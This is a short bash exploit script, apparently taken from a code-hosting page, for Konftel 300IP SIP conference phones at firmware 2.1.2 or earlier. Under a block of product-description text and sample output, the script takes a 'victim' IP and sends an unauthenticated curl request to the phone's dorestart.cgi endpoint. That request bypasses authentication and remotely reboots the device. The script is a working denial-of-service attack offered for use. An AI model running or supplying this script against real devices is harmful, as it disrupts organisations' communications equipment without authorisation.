43 lines
No EOL
1.7 KiB
Bash
Executable file
43 lines
No EOL
1.7 KiB
Bash
Executable file
#!/bin/bash
|
||
# Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit
|
||
#
|
||
# by Todor Donev / 03.2013 / Sofia,Bulgaria
|
||
# email: todor dot donev at gmail com
|
||
# type: hardware
|
||
#
|
||
# The Konftel 300IP is a flexible SIP-based conference phone,
|
||
# perfect for companies that use IP voice services. Its clear,
|
||
# natural sound comes from OmniSound HD, Konftel’s patented
|
||
# wideband audio technology. The stylishly designed
|
||
# Konftel 300IP is packed with intelligent features for more
|
||
# efficient conference calls. Record and store meetings on a
|
||
# SD memory card. Use the conference guide to call
|
||
# pre-programmed groups with just a few simple pushes of a
|
||
# button. Conveniently import and export contact details via
|
||
# the Web interface. Create your own phone book with the
|
||
# personal user profile feature. The Konftel 300IP is also
|
||
# ideal for larger conferences since it can accommodate
|
||
# expansion microphones, an external wireless headset and a
|
||
# PA system. With the Konftel 300IP your company will have
|
||
# a conference phone that combines all the benefits of IP
|
||
# voice service with innovative new features.
|
||
#
|
||
# Example usage:
|
||
# [exploits@amnesium]$ ./k300IP-rbr.sh 192.168.1.180
|
||
# Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit
|
||
# Rebooting 192.168.1.180..
|
||
# Sleeping 30 secs, before rebooting
|
||
# curl: (7) couldn't connect to host
|
||
#
|
||
# Special greetings for Tsvetelina Emirska, Stilyan Angelov and all my other friends!
|
||
|
||
if [ $# != 1 ]; then
|
||
echo "usg: $0 <victim>"
|
||
exit;
|
||
fi
|
||
echo "Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit"
|
||
echo "Rebooting $1.."
|
||
curl http://$1/cgi-bin/dorestart.cgi?doit=Reboot &>/dev/null
|
||
echo "Sleeping 30 secs before rebooting"
|
||
sleep 30
|
||
curl $1 |